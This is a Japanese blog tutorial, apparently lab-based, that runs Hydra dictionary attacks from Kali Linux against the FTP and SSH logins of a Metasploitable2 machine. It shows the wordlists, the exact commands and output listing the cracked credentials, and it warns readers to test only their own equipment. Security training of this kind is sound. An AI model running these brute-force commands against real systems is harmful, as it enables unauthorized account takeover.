1.目的
Hydraを使い、ターゲットマシンのFTPアカウントとSSHアカウントの
ユーザ名、パスワードを解析します。
基本的な攻撃の流れは以下の通りです。
1.情報調査ツールを使い、ターゲットの情報を収集 ←nmapで収集
2.空いているポートに対し攻撃 ←今回の実験
nmapでの情報収集は以下の記事をご覧ください。
※注意事項※
このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。
他者の機器やネットワークで試すことは絶対にしないでください。詳しくはこちら
2.Hydra
Hydraとは、オンラインでパスワードをクラックする有名なツールです。
SSHやFTPアカウント、Webサービスのログインフォームに対してクラッキングできます。
今回の実験は辞書リストを作成し、ターゲットマシンへ辞書攻撃を行います。
3.実験
攻撃用マシン(Kali Linux)からターゲットマシン(Metasploitable2)へ攻撃します。
3-1.実験環境
この実験における環境は、次の通りです。
・Kali Linux(攻撃用マシン)
名前:kali
IPアドレス:192.168.238.128/24
・Metasploitable2(ターゲットマシン)
名前:metasploitable
IPアドレス:192.168.238.130/24
※実験用マシンの準備は以下をご覧ください。
・攻撃用マシン(Kali Linux)の構築
・ターゲットマシン(Metasploitable2)の構築
3-2.実験の用意
Hydra使いFTPアカウントとSSHアカウントを解析します。
まずは、ユーザリスト[user.lst]とパスワードリスト[pass.lst]を作成します。
・ユーザリストを作成
攻撃用マシンのターミナルから以下コマンドを実行し、ユーザ名を記述していきます。
kali:~$ cat > user.lst
─$ cat > user.lst root sys msfadmin admin user service postgres tomcat eido ←[ctrl]+[c]で抜ける
・パスワードリストを作成
攻撃用マシンのターミナルから以下コマンドを実行し、パスワードを記述していきます。
kali:~$ cat > pass.lst
─$ cat > pass.lst user password 12345678 msfadmin root guest batman asdfasdf tomcat eido ←[ctrl]+[c]で抜ける
実験の用意は以上です。
3-3.実験開始
・FTPアカウントを解析します。
攻撃用マシンのターミナルから以下コマンドを実行します。
※最後にターゲットIPとプロトコルを指定します。
kali:~$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp
-L:ユーザリストを指定[user.lst]
-P:パスワードリストを指定[pass.lst]
-t:並列処理のタスク数を指定 ※デフォルトでは16ですが、ここでは8に下げました。
─$ hydra -L user.lst -P pass.lst -t 8 192.168.238.130 ftp Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:21:27 [DATA] max 8 tasks per 1 server, overall 8 tasks, 90 login tries (l:9/p:10), ~12 tries per task [DATA] attacking ftp://192.168.238.130:21/ [21][ftp] host: 192.168.238.130 login: msfadmin password: msfadmin [21][ftp] host: 192.168.238.130 login: user password: user 1 of 1 target successfully completed, 2 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:22:03
・結果
ユーザ名:msfadmin パスワード:msfadmin
ユーザ名:user パスワード:user
FTPアカウントを2つ解析できました。
・SSHアカウントを解析します。
FTPの辞書攻撃と同じ書式ですが、並列処理数を4、最後のプロトコルをsshにします。
kali:~$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh
また、プロトコルのポート番号が変更されている場合
次のような書式でも解析できます。
kali:~$ hydra -L user.lst -P pass.lst -t 4 ssh://192.168.238.130:22
─$ hydra -L user.lst -P pass.lst -t 4 192.168.238.130 ssh Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 11:25:14 [DATA] max 4 tasks per 1 server, overall 4 tasks, 90 login tries (l:9/p:10), ~23 tries per task [DATA] attacking ssh://192.168.238.130:22/ [22][ssh] host: 192.168.238.130 login: sys password: batman [22][ssh] host: 192.168.238.130 login: msfadmin password: msfadmin [22][ssh] host: 192.168.238.130 login: user password: user 1 of 1 target successfully completed, 3 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 11:25:50
・結果
ユーザ名:sys パスワード:batman
ユーザ名:msfadmin パスワード:msfadmin
ユーザ名:user パスワード:user
SSHアカウントを3つ解析できました。
実験は以上です。
4.まとめ
今回はオンラインパスワードクラックの実験を行いました。
ターゲットマシンは脆弱なアカウントを使っているため、辞書攻撃は約30秒程で終わり、
簡単なユーザ名、パスワードにしていると、すぐに解読されてしまうことがわかりました。
また、今回はリストを自作しましたが、Web上には有名な辞書ファイルがたくさんあります。
今回の実験を参考に、新しい実験を試してみてください。
参考サイト、文献
ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習
価格:6,335円
(2021/12/16 01:03時点)